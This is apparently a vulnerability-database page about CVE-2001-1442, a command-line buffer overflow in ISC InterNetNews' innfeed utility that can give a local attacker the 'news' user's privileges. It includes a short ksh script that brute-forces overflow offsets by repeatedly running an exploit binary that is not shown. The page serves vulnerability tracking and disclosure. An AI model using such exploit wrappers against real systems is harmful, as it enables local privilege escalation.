ISC INN 2.x - Command-Line Buffer Overflow (2)
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2001-1442 | 21 Apr 200504:00 | – | cve | |
| CVE-2001-1442 | 21 Apr 200504:00 | – | cvelist | |
| CVE-2001-1442 | 21 Apr 200504:00 | – | debiancve | |
| ISC INN 2.x - Command-Line Buffer Overflow (1) | 18 Apr 200100:00 | – | exploitdb | |
| EUVD-2001-1422 | 7 Oct 202500:30 | – | euvd | |
| CVE-2001-1442 | 21 Apr 200104:00 | – | nvd | |
| DEBIAN-CVE-2001-1442 | 21 Apr 200104:00 | – | osv |
source: https://www.securityfocus.com/bid/2620/info
The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it.
A local attacker in the news group could use this overflow to execute arbitary code with an effective userid of news, which could constitute an elevation in privileges, and the ability to alter news-owned binaries that could be run by root.
Exploits are available against x86 Linux builds of innfeed.
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.01887